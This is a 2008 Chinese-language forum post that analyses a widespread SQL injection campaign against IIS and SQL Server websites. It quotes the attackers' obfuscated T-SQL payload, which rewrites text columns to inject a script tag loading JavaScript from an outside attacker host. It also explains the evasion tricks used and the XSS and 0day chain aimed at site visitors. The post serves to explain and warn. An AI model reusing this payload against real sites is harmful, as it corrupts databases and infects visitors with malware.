瀏覽單個文章
foxtm
Power Member
 
foxtm的大頭照
 

加入日期: Jan 2002
您的住址: 台北苦命IT工人
文章: 586
Smile

引用:
作者野口隆史
這是針對iis的sql代碼注入攻擊
只發生在windows平台上,目前全世界已知被攻擊的網站已經超過50萬了

野口兄說對了..是 SQL Injection 沒錯..不愧是長期在關心相關資訊的高手
剛剛追蹤了 script 後.. 用一些關鍵字去查之後大致了解情況了..
是屬於 SQL Injection + XSS + 0day 混合攻擊型的..
(0day是指在安全補丁發佈前而被了解和掌握的漏洞資訊。)

SQL Injection 使用的 Code 如下..
引用:
作者SQL Injection Code
dEcLaRe @t vArChAr(255),@c vArChAr(255)
dEcLaRe tAbLe_cursoR cUrSoR FoR
exec(‘UpDaTe [’+@t+‘sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD

AnD a.xTyPe=‘u’ AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167)
oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0)
bEgIn
exec(‘UpDaTe [’+@t+‘] sEt [’+@c+‘]=rtrim(convert(varchar,[’+@c+‘]))+cAsT

(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3

C2F7363726970743E3C212D2D aS vArChAr(67))’)
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
eNd
cLoSe tAbLe_cursoR
dEAlLoCaTe tAbLe_cursoR

攻擊者很細心的用了大小寫交錯避開一般程式中對Request的檢查..
對SQL Server資料庫裡面
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
四種資料型態進行 update ..
塞入的資料十六進位為
0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3
轉換為字串即是"></title><script src=http://s.see9.us/s.js></script><!--
這裡再次展現攻擊者的細心 =_= .. 用十六進位代碼取代容易被抓到的 html script ..

因為主攻 sql server .. 所以看起來都是 IIS 中標.. 畢竟一般後台 DB 會用 sql server 的情況下..前台大都是 IIS + ASP (.NET) ..

接下來使用 XSS Attack 讓網站瀏覽者的瀏覽器執行攻擊者安排的 Java Script ..
用 0day 鑽漏洞取得網站瀏覽者本機一定的權限..之前的0day漏洞是抓 real play 的..
但只要攻擊者高興..只要替換 script 隨時可以用其他 0day 漏洞攻擊瀏覽者本機 ..

最後是攻擊者的目的..
應該是 "點廣告" .. 利用三重機制將木馬傳播出去之後 .. 幫攻擊者點網路****賺錢 ..

小弟是參考綜合兩份大陸論壇資料做出的結論..
為免直接連接論壇的危險..所以提供兩份Google 文字快取供板友們參考 ..
http://72.14.235.104/search?q=cache...x&gl=tw&strip=1
http://72.14.235.104/search?q=cache...l=zh-TW&strip=1

僅供參考..有錯歡迎用力吐草~~
舊 2008-05-29, 02:43 AM #17
回應時引用此文章
foxtm離線中